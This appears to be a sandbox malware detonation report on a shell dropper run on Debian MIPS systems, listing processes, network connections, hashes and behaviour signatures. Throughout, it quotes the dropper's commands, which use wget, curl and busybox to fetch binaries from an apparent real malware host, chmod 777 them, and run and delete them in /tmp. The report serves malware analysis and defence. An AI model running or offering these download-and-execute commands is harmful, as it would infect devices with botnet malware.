[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp (row repeated 48 times: 48 identical TCP connections to the same host)

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/842-1-0xb66f0000-0xb6701044-memory.dmp

memory/859-2-0xb6764000-0xb6775044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:03

Platform

debian9-mipsbe-20240611-en

Max time kernel

151s

Max time network

155s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (row repeated 19 times: 19 identical /bin/chmod invocations)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (row repeated 20 times: one read per curl invocation)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp (row repeated 58 times: 58 identical TCP connections to the same host)

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:03

Platform

debian9-mipsel-20240611-en

Max time kernel

83s

Max time network

86s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A (row repeated 28 times: 28 identical /bin/chmod invocations)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
